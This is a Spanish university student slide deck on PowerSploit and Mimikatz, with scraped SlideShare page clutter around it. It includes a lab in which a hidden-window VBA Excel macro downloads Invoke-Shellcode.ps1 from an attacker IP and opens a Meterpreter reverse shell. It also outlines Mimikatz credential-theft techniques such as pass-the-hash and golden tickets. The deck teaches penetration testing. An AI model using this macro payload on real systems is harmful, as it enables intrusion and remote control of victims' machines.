SlideShare ist ein Scribd-Unternehmen logo
1 von 31
Universidad Nacional Micaela Bastidas de Apurímac
FACULTAD DE INGENÍERA
ESCUELAACADÉMICO PROFESIONAL DE INGENIERÍA INFORMÁTICA Y SISTEMAS
HERRAMIENTAS DE EXPLOTACION -
POWERSPLOIT - MIMIKATS
CURSO : Administración de Redes
DOCENTE : Ing. Elvio Tintaya Zegarra
ESTUDIANTES : Alvites León Melitza Graciela
: Cruz Camero Tatiana Ruby
: Gonzales Huamani Yulissa
: Zeilú Massiel Moreano Falcón
: Pedro Luis Ninamanco Pizarro
HERRAMIENTAS DE
EXPLOTACIÓN
Son herramientas que se utilizan para crear
espacios de trabajo de seguridad para pruebas
de vulnerabilidad y sistemas de prueba de
penetración. Es un software completamente
de código abierto y fácil de usar.
2
¿Qué son las herramientas de explotación en Kali Linux?
¿Qué son las herramientas de explotación?
3
Son programas y scripts de
computadora que lo ayudan a
encontrar y aprovechar las
debilidades en los sistemas
informáticos, aplicaciones web,
servidores y redes.
¿ Cuáles son herramientas de
explotación ?
• MetaSploit
• Msfpayload
• Searchsploit
• Social engineering toolkit (root)
• sqlmap
Herramientas post – explotación
Determinar el valor de la máquina comprometida y mantener el control de la
máquina para su uso posterior. El valor de la máquina está determinado por la
sensibilidad de los datos almacenados en ella y la utilidad de la máquina para
comprometer aún más la red..
⬥ backdoor-factory
⬥ bdfproxy
⬥ intersect
⬥ nishang
⬥ powersploit
⬥ proxychains
PowerSploit
Explotación de poder
1
“
“PowerSploit'' es una colección de
módulos de Microsoft PowerShell que
se pueden usar para ayudar a los
evaluadores de penetración durante
todas las fases de una evaluación.
PowerSploit se compone de los
siguientes módulos y scripts”
– MATT GRAEBER
7
VISION GENERAL
Es una herramienta que trata de una
colección de utilidades que van a
ser de gran interés para nuestros
pentests. Cuenta con muchos
módulos con distintos fines:
ejecución de código, modificación
de sripts, persistencia, exfiltración,
bypass de antivirus, elevación de
privilegios, etc.
Recuperado de: https://www.boomernix.com/2019/01/powersploit-windows-
hacking.html#:~:text=Se%20trata%20de%20una%20colecci%C3%B3n,%2C%20elevaci%C3%B3n%20de%20privilegios%
2C%20etc. 8
PowerSploit es una colección
de módulos de Microsoft
Powershell, que pueden ser
utilizados por los pentesters
durante toda la fase del
mismo.
Características:
⬥ Permite al usuario ejecutar
scripts en el sistema de destino
⬥ Omitir antivirus
⬥ Extraer datos de la máquina de
destino
⬥ Escuche el micrófono de la
máquina de destino
9
Plataformas compatibles:
10
Requisitos:
⬥ PowerShell
Módulos y guiones:
12
13
Licencia:
⬥ El proyecto PowerSploit y todos los scripts
individuales están bajo la licencia BSD de 3
cláusulas, a menos que se indique explícitamente lo
contrario.
14
Ahí podemos ver como se dividen los distintos módulos con ls:
PASOS:
1. Creamos una Carpeta por ejemplo que se llame «PowerSploit
1. Abrimos la consola y ejecutamos «git clone
https://github.com/mattifestation/PowerSploit.git»
15
16
3. Nos vamos a la carpeta que se acaba de descargar y entramos a la que se llama
«CodeExcution» y copiamos al HOME el archivo que se llama «Invoke–Shellcode.ps1»
17
4. Abrimos la Consola de Metasploit , ejecutamos el multi handler y configuramos con la IP del
atacante, usamos ExitOnSession luego que se nos cierra el puerto de la víctima continúa abierto
y exploit –j para correr en background, algo así:
18
5. Eso no tocamos más… ahora es tiempo de copiar la macro en un Excel y enviar a la maquina
virtual VICTIMA, amigo no te olvides de cambiar las ip
Public Function Execute() As Variant
Const HIDDEN_WINDOW = 0
strComputer = «.»
Set objWMIService = GetObject(«winmgmts:» & strComputer & «rootcimv2»)
Set objStartup = objWMIService.Get(«Win32_ProcessStartup»)
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject(«winmgmts:» & strComputer & «rootcimv2:Win32_Process»)
objProcess.Create «powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX
((New-Object Net.WebClient).DownloadString(‘http://192.168.116.131/Invoke–Shellcode.ps1′)); Invoke-
Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.116.131
-Lport 4444 -Force», Null, objConfig, intProcessID
End Function
19
6. Abrimos otra Shell y buscamos el archivo «Invoke- – Shellcode.ps1» y le damos permiso de
ejecución de la siguiente manera:
7. Luego ejecutamos «Python –m SimpleHTTPServer 80«
8. Abrimos el EXCEL en la maquina VICTIMA
20
9. En la consola que ejecutamos el
SImpleHTTPServer vamos a ver algo así…
Y en la consola de Metasploit vamos a tener algo
así:
Ya tendríamos una sesión de Meterpreter activa!!
21
⬥ Para usar el módulo, escriba lo siguiente en la
ventana de PowerShell:
Import-Module PowerSploit
⬥ Para enumerar los comandos importados, escriba:
Get-Command-Module PowerSploit
⬥ Para obtener ayuda sobre cada comando, ejecute:
Get-Help
USO:
Técnicas Utilizadas
22
MIMIKATZ
Aplicación de código abierto
2
Historia
26
Delpy descubrió el defecto WDigest en la autenticación de Windows
en 2011, pero Microsoft lo descartó cuando informó de la
vulnerabilidad. En respuesta, creó Mimikatz, escrito en C, y lanzó el
binario a Internet, donde rápidamente ganó popularidad entre los
investigadores de seguridad, sin mencionar la atención no deseada
de los gobiernos de todo el mundo, lo que resultó en la eventual
liberación del código fuente en GitHub.
Mimikatz es una aplicación de
código abierto que permite a los
usuarios manipular las credenciales
de autenticación en los sistemas
Windows. Creado para funcionar
como una herramienta de prueba de
concepto para la seguridad de
Windows, los piratas informáticos
han utilizado Mimikatz para
comprometer muchos tipos
diferentes de sistemas.
27
¿Cómo funciona
Mimikatz?
Mimikatz puede utilizar técnicas para
recopilar credenciales.
⬥ PASS-THE-TICKET
Los datos de contraseña
de un usuario en Windows
se guardan en los llamados
Tickets Kerberos ⬥ KERBEROS GOLDEN
TICKET
Este es un ataque tipo Pass
the Ticket. Este ticket
corresponde a una cuenta
oculta llamada KRBTGT
29
⬥ KERBEROS SILVER
TICKET
Kerberos otorga un ticket
TGS a un usuario y este
puede utilizarlo para
conectarse a cualquier
servicio de la red.
30
⬥ PASS-THE-CACHE
También podría entrar en la
clasificación de ataques tipo Pass the
Ticket. La única diferencia es que en
este caso; Mimikatz utiliza los datos
de conexión grabados y cifrados de
un sistema Mac/UNIX/Linux.
⬥ PASS-THE-HASH
No importa si el atacante no
tiene acceso a la contraseña
en texto plano, del dispositivo
al que quiere saber. Con
Mimikatz, el hacker puede
usar los hashes NTLM para
autenticarse y acceder al
sistema.
Mimikatz puede utilizar técnicas para
recopilar credenciales.
Pasos para la protección contra Mimikatz
⬥ Vigilancia Actualizaciones Mimikatz
⬥ Deshabilitar WDigest
⬥ Protección LSA
⬥ Debug privilege
⬥ Caché de credenciales
⬥ EDR IA Estática y de Comportamiento
31

Weitere ähnliche Inhalte

Ähnlich wie HerramientasExplotacion-GRUPO5.pptx

Ms config
Ms configMs config
Ms configDGS
 
Amenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticaAmenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticafillescas
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesSergio Fuentes
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasArturo Hoffstadt
 
Pruebas de penetración
Pruebas de penetraciónPruebas de penetración
Pruebas de penetraciónDavid Thomas
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesDaniel Fernandez Droniak
 
Ya revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasYa revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasTensor
 
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo realA3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo reala3sec
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...Héctor López
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAMConferencias FIST
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Webacksec
 
Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014nathaliaalvarez26
 

Ähnlich wie HerramientasExplotacion-GRUPO5.pptx (20)

Ms config
Ms configMs config
Ms config
 
Amenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informaticaAmenzas de seguridad en redes modernas - Seguridad informatica
Amenzas de seguridad en redes modernas - Seguridad informatica
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidades
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de Sistemas
 
Pruebas de penetración
Pruebas de penetraciónPruebas de penetración
Pruebas de penetración
 
Analaisis de malwatre trickbot - mp alonso
Analaisis de malwatre   trickbot - mp alonsoAnalaisis de malwatre   trickbot - mp alonso
Analaisis de malwatre trickbot - mp alonso
 
Herramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidadesHerramientas de analisis de vulnerabilidades
Herramientas de analisis de vulnerabilidades
 
Ya revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traserasYa revisaste si tu router tiene puertas traseras
Ya revisaste si tu router tiene puertas traseras
 
2012temariohackingv9
2012temariohackingv92012temariohackingv9
2012temariohackingv9
 
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo realA3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
A3sec Webinar AlienVault USM - Sistemas de detección de ataques en tiempo real
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
 
PRESENTACION bajo costo.pptx
PRESENTACION bajo costo.pptxPRESENTACION bajo costo.pptx
PRESENTACION bajo costo.pptx
 
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
#5minutosdehacking Con Héctor López curso de seguridad informática en el tecn...
 
Test de intrusion
Test de intrusionTest de intrusion
Test de intrusion
 
Análisis Forense Memoria RAM
Análisis Forense Memoria RAMAnálisis Forense Memoria RAM
Análisis Forense Memoria RAM
 
Practica 6
Practica 6Practica 6
Practica 6
 
Los 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo WebLos 7 pecados del Desarrollo Web
Los 7 pecados del Desarrollo Web
 
Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014Arquitectura de software y hardware 2014
Arquitectura de software y hardware 2014
 
Investigacion seguridad 2
Investigacion seguridad 2Investigacion seguridad 2
Investigacion seguridad 2
 
Amenazas lógicas
Amenazas lógicasAmenazas lógicas
Amenazas lógicas
 

Kürzlich hochgeladen

PRESENTACION PASTORAL campeche 2024.pptx
PRESENTACION PASTORAL campeche  2024.pptxPRESENTACION PASTORAL campeche  2024.pptx
PRESENTACION PASTORAL campeche 2024.pptxIsaiasNozYerbes
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...#LatamDigital
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxchinojosa17
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.ayalayenifer617
 
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdfDS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdfKAREN553987
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx241518192
 
PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...delvalleelizabeth400
 
Medios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxMedios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxUniversidad de Bielefeld
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxmrzreyes12
 
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMLA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMalejandroortizm
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.Aldo Fernandez
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfYuriFuentesMartinez2
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfDanielaEspitiaHerrer
 
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIATALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIAobandopaula444
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxNicolas Villarroel
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)BrianaFrancisco
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAcoloncopias5
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDLeslie Villar
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxssuser61dda7
 

Kürzlich hochgeladen (19)

PRESENTACION PASTORAL campeche 2024.pptx
PRESENTACION PASTORAL campeche  2024.pptxPRESENTACION PASTORAL campeche  2024.pptx
PRESENTACION PASTORAL campeche 2024.pptx
 
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat  Vers...
11º Anuncio Nominados Finalistas Premios #LatamDigital 2024 by Interlat Vers...
 
Tema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptxTema 1 - Fundamentos de gestión contable.pptx
Tema 1 - Fundamentos de gestión contable.pptx
 
El uso de las tic en la vida continúa , ambiente positivo y negativo.
El uso de las tic  en la vida continúa , ambiente positivo y negativo.El uso de las tic  en la vida continúa , ambiente positivo y negativo.
El uso de las tic en la vida continúa , ambiente positivo y negativo.
 
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdfDS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
DS 011-2023-MTC.pdf DISTANCIAS DE CARRETERAS.pdf
 
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptxCamposGarcia_MariaMagdalena_M1S3AI6.pptx
CamposGarcia_MariaMagdalena_M1S3AI6.pptx
 
PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...PowerPoint y sus partes más contenidos...
PowerPoint y sus partes más contenidos...
 
Medios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptxMedios Digitales Teorías y Metodologías de Análisis.pptx
Medios Digitales Teorías y Metodologías de Análisis.pptx
 
que es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptxque es Planimetría definición importancia en topografia.pptx
que es Planimetría definición importancia en topografia.pptx
 
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAMLA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
LA ETICA DEL UTILITARISMO DE JEREMY BENTHAM
 
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
ChatGPT Inteligencia artificial, funciones, limitaciones y ventajas.
 
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdfFLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
FLUIDEZ-Teatro-Leido-4to-Grado-El-leon-y-el-raton- (1).pdf
 
Software y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdfSoftware y servicios de internet mapa conceptual.pdf
Software y servicios de internet mapa conceptual.pdf
 
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIATALLER DE ANALISIS SOLUCION DE TECNOLOGIA
TALLER DE ANALISIS SOLUCION DE TECNOLOGIA
 
GRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptxGRUPO 5 Software en el campo de la salud.pptx
GRUPO 5 Software en el campo de la salud.pptx
 
Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)Practica guiada Menu_ tecnología (Tic's)
Practica guiada Menu_ tecnología (Tic's)
 
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIAFisica General.pdf ESCUELA D QUIMICA E INGENIERIA
Fisica General.pdf ESCUELA D QUIMICA E INGENIERIA
 
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULDGRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
GRUPO 10 SOFTWARE DE EL CAMPO DE LA SAULD
 
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptxrodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
rodriguez_DelAngel_MariaGPE_M1S3AL6.pptx
 

HerramientasExplotacion-GRUPO5.pptx

  • 1. Universidad Nacional Micaela Bastidas de Apurímac FACULTAD DE INGENÍERA ESCUELAACADÉMICO PROFESIONAL DE INGENIERÍA INFORMÁTICA Y SISTEMAS HERRAMIENTAS DE EXPLOTACION - POWERSPLOIT - MIMIKATS CURSO : Administración de Redes DOCENTE : Ing. Elvio Tintaya Zegarra ESTUDIANTES : Alvites León Melitza Graciela : Cruz Camero Tatiana Ruby : Gonzales Huamani Yulissa : Zeilú Massiel Moreano Falcón : Pedro Luis Ninamanco Pizarro
  • 2. HERRAMIENTAS DE EXPLOTACIÓN Son herramientas que se utilizan para crear espacios de trabajo de seguridad para pruebas de vulnerabilidad y sistemas de prueba de penetración. Es un software completamente de código abierto y fácil de usar. 2 ¿Qué son las herramientas de explotación en Kali Linux?
  • 3. ¿Qué son las herramientas de explotación? 3 Son programas y scripts de computadora que lo ayudan a encontrar y aprovechar las debilidades en los sistemas informáticos, aplicaciones web, servidores y redes.
  • 4. ¿ Cuáles son herramientas de explotación ? • MetaSploit • Msfpayload • Searchsploit • Social engineering toolkit (root) • sqlmap
  • 5. Herramientas post – explotación Determinar el valor de la máquina comprometida y mantener el control de la máquina para su uso posterior. El valor de la máquina está determinado por la sensibilidad de los datos almacenados en ella y la utilidad de la máquina para comprometer aún más la red.. ⬥ backdoor-factory ⬥ bdfproxy ⬥ intersect ⬥ nishang ⬥ powersploit ⬥ proxychains
  • 7. “ “PowerSploit'' es una colección de módulos de Microsoft PowerShell que se pueden usar para ayudar a los evaluadores de penetración durante todas las fases de una evaluación. PowerSploit se compone de los siguientes módulos y scripts” – MATT GRAEBER 7
  • 8. VISION GENERAL Es una herramienta que trata de una colección de utilidades que van a ser de gran interés para nuestros pentests. Cuenta con muchos módulos con distintos fines: ejecución de código, modificación de sripts, persistencia, exfiltración, bypass de antivirus, elevación de privilegios, etc. Recuperado de: https://www.boomernix.com/2019/01/powersploit-windows- hacking.html#:~:text=Se%20trata%20de%20una%20colecci%C3%B3n,%2C%20elevaci%C3%B3n%20de%20privilegios% 2C%20etc. 8 PowerSploit es una colección de módulos de Microsoft Powershell, que pueden ser utilizados por los pentesters durante toda la fase del mismo.
  • 9. Características: ⬥ Permite al usuario ejecutar scripts en el sistema de destino ⬥ Omitir antivirus ⬥ Extraer datos de la máquina de destino ⬥ Escuche el micrófono de la máquina de destino 9
  • 12. 12
  • 13. 13 Licencia: ⬥ El proyecto PowerSploit y todos los scripts individuales están bajo la licencia BSD de 3 cláusulas, a menos que se indique explícitamente lo contrario.
  • 14. 14 Ahí podemos ver como se dividen los distintos módulos con ls:
  • 15. PASOS: 1. Creamos una Carpeta por ejemplo que se llame «PowerSploit 1. Abrimos la consola y ejecutamos «git clone https://github.com/mattifestation/PowerSploit.git» 15
  • 16. 16 3. Nos vamos a la carpeta que se acaba de descargar y entramos a la que se llama «CodeExcution» y copiamos al HOME el archivo que se llama «Invoke–Shellcode.ps1»
  • 17. 17 4. Abrimos la Consola de Metasploit , ejecutamos el multi handler y configuramos con la IP del atacante, usamos ExitOnSession luego que se nos cierra el puerto de la víctima continúa abierto y exploit –j para correr en background, algo así:
  • 18. 18 5. Eso no tocamos más… ahora es tiempo de copiar la macro en un Excel y enviar a la maquina virtual VICTIMA, amigo no te olvides de cambiar las ip Public Function Execute() As Variant Const HIDDEN_WINDOW = 0 strComputer = «.» Set objWMIService = GetObject(«winmgmts:» & strComputer & «rootcimv2») Set objStartup = objWMIService.Get(«Win32_ProcessStartup») Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = HIDDEN_WINDOW Set objProcess = GetObject(«winmgmts:» & strComputer & «rootcimv2:Win32_Process») objProcess.Create «powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString(‘http://192.168.116.131/Invoke–Shellcode.ps1′)); Invoke- Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.116.131 -Lport 4444 -Force», Null, objConfig, intProcessID End Function
  • 19. 19 6. Abrimos otra Shell y buscamos el archivo «Invoke- – Shellcode.ps1» y le damos permiso de ejecución de la siguiente manera: 7. Luego ejecutamos «Python –m SimpleHTTPServer 80« 8. Abrimos el EXCEL en la maquina VICTIMA
  • 20. 20 9. En la consola que ejecutamos el SImpleHTTPServer vamos a ver algo así… Y en la consola de Metasploit vamos a tener algo así: Ya tendríamos una sesión de Meterpreter activa!!
  • 21. 21 ⬥ Para usar el módulo, escriba lo siguiente en la ventana de PowerShell: Import-Module PowerSploit ⬥ Para enumerar los comandos importados, escriba: Get-Command-Module PowerSploit ⬥ Para obtener ayuda sobre cada comando, ejecute: Get-Help USO:
  • 23.
  • 24.
  • 26. Historia 26 Delpy descubrió el defecto WDigest en la autenticación de Windows en 2011, pero Microsoft lo descartó cuando informó de la vulnerabilidad. En respuesta, creó Mimikatz, escrito en C, y lanzó el binario a Internet, donde rápidamente ganó popularidad entre los investigadores de seguridad, sin mencionar la atención no deseada de los gobiernos de todo el mundo, lo que resultó en la eventual liberación del código fuente en GitHub.
  • 27. Mimikatz es una aplicación de código abierto que permite a los usuarios manipular las credenciales de autenticación en los sistemas Windows. Creado para funcionar como una herramienta de prueba de concepto para la seguridad de Windows, los piratas informáticos han utilizado Mimikatz para comprometer muchos tipos diferentes de sistemas. 27
  • 29. Mimikatz puede utilizar técnicas para recopilar credenciales. ⬥ PASS-THE-TICKET Los datos de contraseña de un usuario en Windows se guardan en los llamados Tickets Kerberos ⬥ KERBEROS GOLDEN TICKET Este es un ataque tipo Pass the Ticket. Este ticket corresponde a una cuenta oculta llamada KRBTGT 29 ⬥ KERBEROS SILVER TICKET Kerberos otorga un ticket TGS a un usuario y este puede utilizarlo para conectarse a cualquier servicio de la red.
  • 30. 30 ⬥ PASS-THE-CACHE También podría entrar en la clasificación de ataques tipo Pass the Ticket. La única diferencia es que en este caso; Mimikatz utiliza los datos de conexión grabados y cifrados de un sistema Mac/UNIX/Linux. ⬥ PASS-THE-HASH No importa si el atacante no tiene acceso a la contraseña en texto plano, del dispositivo al que quiere saber. Con Mimikatz, el hacker puede usar los hashes NTLM para autenticarse y acceder al sistema. Mimikatz puede utilizar técnicas para recopilar credenciales.
  • 31. Pasos para la protección contra Mimikatz ⬥ Vigilancia Actualizaciones Mimikatz ⬥ Deshabilitar WDigest ⬥ Protección LSA ⬥ Debug privilege ⬥ Caché de credenciales ⬥ EDR IA Estática y de Comportamiento 31